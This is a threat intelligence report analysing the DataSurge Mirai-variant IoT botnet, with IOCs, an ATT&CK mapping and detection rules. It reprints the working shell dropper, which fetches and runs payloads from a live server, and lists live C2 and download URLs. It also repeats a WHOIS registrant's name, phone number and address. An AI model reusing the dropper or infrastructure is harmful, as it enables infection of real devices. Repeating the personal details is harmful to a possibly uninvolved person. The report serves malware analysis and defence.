Back to reports
highIoT

DataSurge Botnet — Mirai Variant IoT Dropper with DNS-Based Dynamic C2

PublishedMarch 13, 2026
Threat Actors:using a common configuration or toolkit.s).and Threat Actor Assessments seeking jurisdictional protection.
iot-vulnc2botnetbrute-forceexploitiot

Executive Summary

The DataSurge Botnet is an active Mirai-variant IoT botnet campaign discovered in March 2026 targeting embedded Linux devices across 10+ CPU architectures. The operation deploys a multi-stage infection chain: a POSIX shell dropper (bbc) selects and fetches a matching architecture-specific ELF payload from a dedicated distribution server (5.175.223.124), which then beacons to a dedicated C2 IP (130.12.180.151) discovered via a DNS TXT record published by the domain datasurge-bot.com. This DNS-based dynamic configuration mechanism is a deliberate OPSEC improvement over hardcoded C2 addresses seen in earlier Mirai forks.

The actor operates a commercial Botnet-as-a-Service (BaaS) infrastructure under the datasurge.vip brand, including a web reporting panel (report.datasurge.vip) and a payment interface (pay.datasurge.vip), indicating this is a for-hire DDoS capability. The C2 infrastructure is intentionally split across two hosting providers (GhostNet/NextSolutions in the Netherlands for payload hosting; Netiface LLC / Omegatech in the US for the actual C2) to complicate takedown. Both servers expose anonymous FTP with a distinctive custom banner (220 Features: a .).

At time of writing, the campaign accounts for at least 139 unique malware samples linked to datasurge-bot.com, with samples dating to early February 2026. The botnet poses a risk to consumer routers, IP cameras, DVRs, and other IoT devices reachable via Telnet/SSH with weak or default credentials.


Sample Metadata

FieldValue
SHA256c308e27636663b280698ddb93f7b1b513159df2058a4a37dc3a371c70f7d9120
SHA1016dbb6e84bd4bf4ea65b32dfa329e6d54c99ed3
MD59d7d0f73eb7ef174dc379655a52f8441
File Namebbc (also observed as bbc.sh, jaws.sh)
File TypePOSIX shell script, ASCII text
File Size508 bytes
First Seen2026-03-12 20:37:26 UTC (abuse.ch)
VT Detections12/76
VT Threat Labeldownloader.miraidlod/possible
VT Tagsshell, sets-process-name, detect-debug-environment, self-delete, service-scan
CompilerN/A (shell script)

Stage 2 Binary Metadata (x86_64)

FieldValue
SHA256f02a038797f449d63d32d2eae14ddab662c6f14e9e279ef1eaa01a400fdbefb0
File Namedata.x86_64
File TypeELF 64-bit LSB executable, x86-64, statically linked, stripped
File Size898,760 bytes
VT Detections6/76
VT Threat Labeltrojan.mirai
CompilerGCC 12.3.0 (Buildroot 2021.11-11272-ge2962af)

Static Analysis — Stage 1: Shell Dropper (bbc)

Full Source

#!/bin/sh

ARCH=$(uname -m)
case "$ARCH" in
    armv4*) BIN="data.arm4" ;;
    armv5*) BIN="data.arm5" ;;
    armv6*) BIN="data.arm6" ;;
    armv7*) BIN="data.arm7" ;;
    mips*) BIN="data.mips-uclibc" ;;
    mipsel*) BIN="data.mipsel-uclibc" ;;
    aarch64) BIN="data.aarch64" ;;
    powerpc*) BIN="data.powerpc" ;;
    i*86) BIN="data.x86" ;;
    x86_64) BIN="data.x86_64" ;;
    *) BIN="data.arm7" ;;
esac
cd /tmp
rm $BIN
busybox wget http://5.175.223.124/$BIN
chmod 777 $BIN
./$BIN
rm $BIN
rm $0

Analysis

The dropper is a minimal 508-byte shell script with no obfuscation. Operational behaviors:

  1. Architecture detection: Calls uname -m to identify the CPU type and selects the corresponding binary filename.
  2. Target directory: Changes to /tmp — a universally writable path available on minimal embedded Linux systems where /tmp is typically a tmpfs mount.
  3. Pre-execution cleanup: Deletes any pre-existing binary with the target filename before downloading, avoiding stale files.
  4. Download via busybox wget: Uses busybox wget rather than standard wget or curl, confirming the target environment is an IoT/embedded device where BusyBox is the primary userland toolset.
  5. Permission escalation: chmod 777 to make the binary executable (addresses scenarios where the filesystem is mounted with restrictive defaults).
  6. Execution and cleanup: Runs the payload, then deletes both the binary and the dropper script (rm $0), leaving no artifacts.

Supported architectures: arm4, arm5, arm6, arm7, mips-uclibc, mipsel-uclibc, aarch64, powerpc, x86, x86_64. Default fallback is arm7, reflecting the target demographic (ARM-based home routers, cameras, NAS devices).


Static Analysis — Stage 2: Mirai ELF Payload

Architecture Support

Binaries were retrieved live from the distribution server for all 10 variants:

FilenameArchitectureSizeSHA256 (partial)
data.x86_64x86-64 ELF64, statically linked, stripped898 KBf02a038797...
data.x86i386 ELF32, statically linked, stripped931 KB5d84a43059...
data.arm7ARM EABI4 ELF32, statically linked, stripped138 KB6dfa1e31b2...
data.mips-uclibcMIPS MSB ELF32, statically linked, stripped201 KBfdea4b7688...

All binaries compiled with GCC 12.3.0 (Buildroot 2021.11-11272-ge2962af), indicating a purpose-built cross-compilation toolchain for IoT botnet payload production.

Key Extracted Strings

StringSignificance
y_BackwaH3NProcess rename target — bot hides under this name after execution
\.uhavenobotsxdBlacklisted string pattern (prevents re-infection of already-infected devices)
bbc.shReferences to the dropper script name
12x\.shReferences to another campaign dropper variant
/dev/shmSecondary execution path — memory-resident execution to evade disk forensics
/login, /api/usersWeb panel API endpoints for the operator's C2 dashboard
com.qihoo.daemonQihoo 360 AV process name — bot terminates Chinese AV if found
[DEBUG_MODE_ATTACK] attack_parse:...Debug-mode attack command parsing strings
[DEBUG_MODE_ATTACK] attack_start:...Debug-mode attack execution strings
Blacklisted backdoor, Blacklisted patternConflict avoidance — bot checks for competing malware
floodDDoS flood attack capability
datasurge-bot.comC2 domain queried for DNS TXT-based configuration

Dynamic C2 Resolution (DNS TXT Method)

The binary queries datasurge-bot.com for a TXT record to dynamically retrieve the C2 server address. This is a OPSEC improvement over hardcoded IPs, as the operator can migrate C2 infrastructure by simply updating the DNS record.

The DNS TXT record in the wild (base64-wrapped):

XHgwNFx4MDVceDFFXHgwMVx4MDNceDAxXHgxRVx4MDZceDA1XHgxRVx4MDdceDA0

Decoded content (12 bytes):

04 05 1E 01 03 01 1E 06 05 1E 07 04

This is an operator-defined encoding of the C2 connection configuration. Sandbox analysis confirms datasurge-bot.com resolved to 130.12.180.151 (the confirmed C2 server). The 0x1E byte pattern likely serves as a structural delimiter.

Attack Capabilities (Inferred from Strings)

The debug strings confirm a full Mirai-derived attack framework:

  • Multi-target DDoS: attack_parse: target count=%u
  • Duration control: attack_parse: duration=%u seconds
  • Multiple attack vectors: attack_parse: vector=%u
  • Attack process forking: attack_start: forked attack process pid=%d
  • Slot-based concurrency management: attack_start: no free slots available

Standard Mirai DDoS vectors include: UDP flood, TCP SYN flood, HTTP GET flood, DNS amplification, GRE flood.


Full Infection Chain

[Vulnerable IoT Device]
        |
        | (Telnet/SSH brute force with default creds)
        |
[Loader / Existing Bot drops dropper script]
        |
        v
[bbc.sh / jaws.sh Dropper executes]
   1. uname -m → detect architecture
   2. cd /tmp
   3. busybox wget http://5.175.223.124/data.$ARCH
   4. chmod 777 data.$ARCH
   5. ./data.$ARCH
   6. rm data.$ARCH && rm $0
        |
        v
[Stage 2 ELF Mirai Bot executes]
   1. Rename process to "y_BackwaH3N"
   2. Fork and daemonize
   3. Query datasurge-bot.com TXT record
      → resolves to 130.12.180.151
   4. Connect to C2: 130.12.180.151:25565
   5. Receive attack commands
   6. Kill competing malware (Blacklisted patterns)
   7. Kill Qihoo 360 AV (com.qihoo.daemon)
   8. Scan for new vulnerable targets (telnet/ssh)
   9. Execute DDoS floods on operator command

Network Indicators and Infrastructure

Indicator Table

TypeValueRoleNotes
IP5.175.223.124Payload distribution serverAS204464 GhostNet/NextSolutions, NL
IP130.12.180.151C2 serverAS202412 Omegatech/Netiface LLC, US
Domaindatasurge-bot.comC2 config domain (DNS TXT)Registered 2026-02-03 via IONOS
Domaindatasurge.vipOperator web infrastructureRegistered 2025-08-08 via Namecheap
URLhttp://5.175.223.124/data.x86_64Stage 2 payload downloadConfirmed by ET IDS alert
URLhttp://5.175.223.124/data.x86Stage 2 payload download
URLhttp://5.175.223.124/data.arm7Stage 2 payload download
URLhttp://5.175.223.124/data.mips-uclibcStage 2 payload download
URLhttp://5.175.223.124/data.arm4Stage 2 payload download (inferred)
URLhttp://5.175.223.124/data.arm5Stage 2 payload download (inferred)
URLhttp://5.175.223.124/data.arm6Stage 2 payload download (inferred)
URLhttp://5.175.223.124/data.aarch64Stage 2 payload download (inferred)
URLhttp://5.175.223.124/data.powerpcStage 2 payload download (inferred)
URLhttp://5.175.223.124/data.mipsel-uclibcStage 2 payload download (inferred)
Subdomainreport.datasurge.vipOperator C2 web panelOrigin at 5.175.223.124 (CF 522)
Subdomainpay.datasurge.vipPayment portal (BaaS)crt.sh cert confirmed

Download Server: 5.175.223.124

AttributeValue
ASNAS204464
AS NameGhostNet (Justin Franke)
OrganizationNextSolutions Einzelunternehmen
Legal NameJustin Franke
Addressc/o MDC Management#4627, Welserstrasse 3, 87463 Dietmannsried, DE
Phone+491636914800
CountryNL (network) / DE (registrant)
RIPE Org Created2026-01-09
Route Created2026-01-22
Abuse Emailabuse@ghostnet.de
Open Ports21/tcp (FTP), 22/tcp (SSH OpenSSH 9.6p1), 80/tcp (HTTP), 8080/tcp (HTTP)
FTPAnonymous FTP enabled; banner: 220 Features: a .
VT Detections11/94 malicious
HTTP ResponseCloudflare 522 for report.datasurge.vip on port 80 (leaks origin domain)

OPSEC Failure: The HTTP server on port 80 is configured as the origin for report.datasurge.vip but Cloudflare returns a 522 error, leaking the relationship between the download server and the operator's web panel domain.

C2 Server: 130.12.180.151

AttributeValue
ASNAS202412
AS NameOmegatech LTD
OrganizationNetiface LLC
Address6844 Bardstown Rd, Louisville, KY 40291, US
ARIN Net Registered2025-10-08
Open Ports21/tcp (FTP anon), 22/tcp (SSH OpenSSH 8.9p1 Ubuntu), 111/tcp (rpcbind), 25565/tcp
FTPAnonymous FTP enabled; banner: 220 Features: a . (same as download server)
Shodan Tagsscanner — actively scanning internet
VT Detections20/94 malicious
DNS Hostnamedatasurge-bot.com
DNS Resolved2026-02-14 (UNIX: 1771045368)

Port 25565: Typically the Minecraft game server port, repurposed here as the Mirai C2 listener port. This is a common evasion technique to blend in with legitimate game server traffic.

Identical FTP Banner: Both 5.175.223.124 and 130.12.180.151 expose an FTP server with the banner 220 Features: a .. This shared banner strongly suggests both servers are operated by the same actor using a common configuration or toolkit.


Campaign Context

VT pivot on datasurge-bot.com yields 139 unique malware samples communicating with this domain, all classified as trojan.mirai or downloader.miraidlod. A representative selection:

SHA256 (partial)NameDetectionsLabel
07334a75d54d824b...39649075822/76trojan.mirai
1218e6668ff21f5d....elf32/76trojan.mirai/r002c0xb726
1f8080e52d6a3a5e...data.arm535/76trojan.mirai/r002c0dbl26
1fefa1a8d9e60cd6...data.arm728/76trojan.mirai/sjwoa
1ffacb6cb04640a6...data.x86_6426/76trojan.mirai
336687311750c9c8...f21ci5j.exe23/76trojan.mirai
3ca9cd2138e64d0b...wwmv7l.exe24/76trojan.mirai/r002c0dbp26
42726566bbedec0b...jtmz4nk.exe28/76trojan.mirai/usblb626
55476379e665d75a...wget_data.aarch6434/76trojan.mirai/phzka
c308e27636663b28...bbc (this sample)12/76downloader.miraidlod/possible

Notable finding: The campaign includes .exe files (Windows PE), suggesting the operator is also targeting Windows systems with a Mirai-derived loader. This is consistent with newer Mirai forks (e.g., Mirai v4, ZeroBot, or custom forks) that have added Windows infection capability.

Campaign Timeline

DateEvent
2025-08-08datasurge.vip registered via Namecheap
2026-01-09AS204464/NextSolutions RIPE org created
2026-01-22Route 5.175.223.0/24 created in RIPE
2026-02-03datasurge-bot.com registered via IONOS; TLS certificates issued (Google Trust + Let's Encrypt)
2026-02-14datasurge-bot.com DNS resolves to 130.12.180.151 (first sandbox observation)
2026-03-09report.datasurge.vip origin server last modified (Last-Modified: Mon, 09 Mar 2026 20:44:29 GMT)
2026-03-12bbc dropper submitted to abuse.ch (this sample)
2026-03-13Active — binaries still serving from 5.175.223.124

Dropper Script Naming

Multiple dropper filenames observed across related samples: bbc, bbc.sh, jaws.sh, 12x.sh. The numeric names like 396490758, 399305898 appear to be bot/campaign tracking IDs generated by the operator's infrastructure.


Behavioral Analysis (Inferred)

Post-Compromise Actions

  1. Process rename: The bot renames itself to y_BackwaH3N using prctl(PR_SET_NAME) — a standard Mirai technique to hide from ps output inspection.

  2. Anti-forensics: Files are deleted from /tmp after execution. The bot may also attempt execution from /dev/shm for fully memory-resident operation.

  3. Competition elimination: The bot checks for and kills processes matching blacklisted patterns (Blacklisted backdoor, Blacklisted pattern), including Qihoo 360 AV (com.qihoo.daemon). Also observed: pkill -9 nc (kills netcat backdoors left by other actors).

  4. Scanner behavior: Shodan tags 130.12.180.151 as a "scanner" — the C2 server itself participates in propagation scanning, typical of Mirai's distributed scanning model where each bot scans random IP space for Telnet/SSH.

  5. C2 protocol: Likely uses a modified binary protocol derived from Mirai's original TCP-based CNC protocol over port 25565.

  6. DDoS execution: On receiving attack commands, the bot forks child processes to execute flood attacks against specified targets for a defined duration.


MITRE ATT&CK TTP Mapping

Technique IDTechniqueDescription
T1595.001Active Scanning: Scanning IP BlocksC2 server (130.12.180.151) tagged as active scanner
T1190Exploit Public-Facing ApplicationInitial access via Telnet/SSH brute force on IoT devices
T1078.001Default AccountsUse of default IoT device credentials for initial access
T1059.004Command and Scripting Interpreter: Unix ShellShell script dropper (bbc) executes the infection chain
T1105Ingress Tool Transferbusybox wget downloads stage 2 payload from distribution server
T1036.005Masquerading: Match Legitimate Name or LocationProcess renamed to y_BackwaH3N; payload stored in /tmp
T1070.004Indicator Removal: File DeletionDropper deletes payload and self (rm $BIN && rm $0)
T1496Resource HijackingDDoS capability rents infected bots to third parties
T1071.004Application Layer Protocol: DNSDNS TXT record used to deliver dynamic C2 IP configuration
T1568.001Dynamic Resolution: Fast Flux DNSDNS TXT record allows operator to change C2 IP without recompiling
T1027Obfuscated Files or InformationC2 address encoded in DNS TXT record (not hardcoded)
T1562.001Impair Defenses: Disable or Modify ToolsKills Qihoo 360 AV process (com.qihoo.daemon)
T1489Service StopKills competing malware and backdoor processes
T1498Network Denial of ServiceCore botnet DDoS capability — UDP flood, TCP SYN flood, etc.
T1583.001Acquire Infrastructure: Domainsdatasurge.vip, datasurge-bot.com registered for C2
T1584.004Compromise Infrastructure: ServerVPS acquired from GhostNet (NL) and Omegatech (US)
T1608.001Stage Capabilities: Upload MalwareMulti-arch payloads staged on distribution server

IOC Reference

Hashes

TypeHashDescription
SHA256c308e27636663b280698ddb93f7b1b513159df2058a4a37dc3a371c70f7d9120Stage 1 dropper bbc
MD59d7d0f73eb7ef174dc379655a52f8441Stage 1 dropper
SHA1016dbb6e84bd4bf4ea65b32dfa329e6d54c99ed3Stage 1 dropper
SHA256f02a038797f449d63d32d2eae14ddab662c6f14e9e279ef1eaa01a400fdbefb0Stage 2 data.x86_64
SHA2565d84a43059e40879ce7dfa16f3c0d0607904aa1ab7434f0dfb5228289f55ddffStage 2 data.x86
SHA2566dfa1e31b246ddcc95bd98c8267e2742ec72eb42193b7bcf06a7326df74e2ae8Stage 2 data.arm7
SHA256fdea4b7688114a4edf26deb83a1a24bdd5d3edb3755d28da514f2ff7a7423a66Stage 2 data.mips-uclibc

Network IOCs

TypeValueNotes
IPv45.175.223.124Payload distribution server
IPv4130.12.180.151C2 server
Domaindatasurge-bot.comC2 configuration domain (DNS TXT)
Domaindatasurge.vipOperator branding domain
CIDR5.175.223.0/24AS204464 GhostNet/NextSolutions
CIDR130.12.180.0/22AS202412 Omegatech/Netiface LLC
URLhttp://5.175.223.124/data.x86_64Payload download
URLhttp://5.175.223.124/data.x86Payload download
URLhttp://5.175.223.124/data.arm7Payload download
URLhttp://5.175.223.124/data.mips-uclibcPayload download
URLhttp://5.175.223.124/data.arm5Payload download
URLhttp://5.175.223.124/data.aarch64Payload download
URLhttp://5.175.223.124/data.powerpcPayload download
Port25565/tcp on 130.12.180.151Suspected Mirai C2 listener

String / Behavioral IOCs

TypeValueNotes
Process namey_BackwaH3NBot process rename
Mutex/marker\.uhavenobotsxdAnti-reinfection marker
Script namebbc.sh, jaws.sh, 12x.shDropper filenames
DNS querydatasurge-bot.com TXTC2 config lookup
FTP banner220 Features: a .Shared across both servers

Attribution and Threat Actor Assessment

Confidence Level: MODERATE

Indicators

  • The operator maintains a branded "DataSurge" infrastructure including a web panel (report.datasurge.vip), payment portal (pay.datasurge.vip), and bot management domain (datasurge-bot.com), strongly indicating a commercial DDoS-for-hire (booter/stresser) operation or Botnet-as-a-Service (BaaS) offering.

  • The infrastructure was bootstrapped in late 2025 / early 2026:

    • datasurge.vip registered August 2025
    • New ASN (AS204464) registered January 2026
    • datasurge-bot.com registered February 2026
  • OPSEC Mistakes:

    1. The HTTP server on 5.175.223.124 leaks the Cloudflare-proxied domain report.datasurge.vip in its 522 error response, linking the file distribution IP to the operator's web panel.
    2. The FTP server on both C2 and distribution IPs shares an identical distinctive banner (220 Features: a .), linking the two servers.
    3. The RIPE WHOIS for AS204464 contains an individual's full name (Justin Franke), phone number (+491636914800), and physical address (Welserstrasse 3, 87463 Dietmannsried, DE). This may be a genuine identity, a fraudulent registration, or a re-sold VPS attribution. The phone and address should be treated as potentially unverified.
  • The actor appears to be a relatively new entrant to the botnet-as-a-service market, based on the recent infrastructure registration dates and the moderate campaign size (139 samples over ~6 weeks).

  • Geolocation is inconclusive: download infrastructure is in NL, C2 is in US, registration details point to DE. Use of bulletproof/permissive hosters (GhostNet, Netiface/Omegatech) is consistent with criminal actors seeking jurisdictional protection.


Infrastructure Map

          ┌─────────────────────────────────────────────────────┐
          │              CLOUDFLARE (AS13335)                   │
          │   104.21.18.175 / 172.67.182.208                    │
          │   datasurge.vip (CDN/WAF proxy)                     │
          │   report.datasurge.vip → origin: 5.175.223.124      │
          │   pay.datasurge.vip                                  │
          └─────────────────────────────────────────────────────┘
                              │
                              │ (reverse proxy)
                              ▼
┌─────────────────────────────────┐       ┌──────────────────────────────────┐
│   DISTRIBUTION SERVER           │       │   C2 / BOT SERVER                │
│   5.175.223.124                 │       │   130.12.180.151                 │
│   AS204464 GhostNet/NextSol NL  │       │   AS202412 Omegatech US          │
│                                 │       │                                  │
│   Ports: 21(FTP), 22(SSH)       │       │   Ports: 21(FTP), 22(SSH)       │
│          80(HTTP), 8080(HTTP)   │       │          111(rpc), 25565(C2)     │
│                                 │       │                                  │
│   Files: data.arm4/5/6/7        │       │   ← datasurge-bot.com DNS TXT    │
│          data.mips-uclibc       │       │   Shodan: tagged "scanner"       │
│          data.mipsel-uclibc     │       │   Anonymous FTP enabled          │
│          data.aarch64           │       └──────────────────────────────────┘
│          data.powerpc                             ▲
│          data.x86 / data.x86_64 │                │ DNS TXT lookup
└─────────────────────────────────┘                │
              ▲                     ┌───────────────────────────────┐
              │ wget download       │   datasurge-bot.com           │
              │                    │   Registered: 2026-02-03 IONOS │
┌─────────────────────────────┐    │   NS: Cloudflare              │
│   bbc / bbc.sh dropper      │    │   TXT: encoded C2 config      │
│   (Stage 1 – 508 bytes)     │────│   Resolves to: 130.12.180.151 │
│   busybox wget payload      │    └───────────────────────────────┘
│   then executes + self-del  │
└─────────────────────────────┘
              │
              │ (deployed via Telnet/SSH brute force)
              ▼
┌─────────────────────────────┐
│   INFECTED IoT DEVICE       │
│   Routers, cameras, DVRs    │
│   /tmp/data.$ARCH           │
│   Process: y_BackwaH3N      │
│   Scans for more victims    │
└─────────────────────────────┘

Detection Recommendations

Network Detection

  1. Block C2 IP: 130.12.180.151 — active C2 server
  2. Block download server: 5.175.223.124 — payload distribution
  3. Block domains: datasurge-bot.com, datasurge.vip (resolve to block at DNS level)
  4. Alert on DNS TXT queries to datasurge-bot.com — any device making this query is infected
  5. Alert on HTTP GET to IP addresses matching pattern /data\.(arm|mips|x86|aarch64|powerpc)[a-z_0-9-]*$ — dropper download signature
  6. Alert on ELF downloads over HTTP from non-CDN IPs on port 80

Host-Based Detection

  1. Process name y_BackwaH3N — if this process is running, the device is compromised
  2. Files: /tmp/data.arm*, /tmp/data.x86*, /tmp/data.mips*, /tmp/data.aarch64, /tmp/data.powerpc
  3. Dropper names: bbc.sh, jaws.sh, 12x.sh in /tmp
  4. busybox wget spawning from unexpected parent processes

Report generated: 2026-03-13 | Analyst: GHOST / Breakglass Intelligence

Share